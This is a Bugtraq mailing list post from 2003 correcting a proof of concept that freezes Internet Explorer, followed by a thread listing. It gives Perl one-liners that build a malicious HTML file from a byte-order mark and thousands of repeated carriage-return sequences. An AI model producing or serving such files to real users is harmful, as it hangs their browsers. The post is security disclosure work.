Bugtraq mailing list archives

Re: April appeared to be a month of IE bugs. Here's another one.

From: "ERRor" <error () pochtamt ru>
Date: Thu, 1 May 2003 05:26:34 +0400

Hello, Bugtraq.

Malicious htm file can freeze IE with 100% CPU usage:
Construct the file freeze.htm:
c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm

 This string works only with Active Perl, in unix-like Perl versions exploit
string is:
 perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
 Active Perl understand \n = \x0D\x0A, freeze of  IE exist only if sequence
 of bytes will be ...\x0D\x0D\x0A...
 Sorry, I have not noticed it at once.

 Best Regards, ERRor, dHtm.

Current thread:

Re: April appeared to be a month of IE bugs. Here's another one. ERRor (May 01)
- Re: April appeared to be a month of IE bugs. Here's another one. mbergson <Joachim.Strombergson () InformAsic com> (May 02)
- <Possible follow-ups>
- Re: April appeared to be a month of IE bugs. Here's another one. Cove Schneider (May 01)
- Re: April appeared to be a month of IE bugs. Here's another one. Cove Schneider (May 01)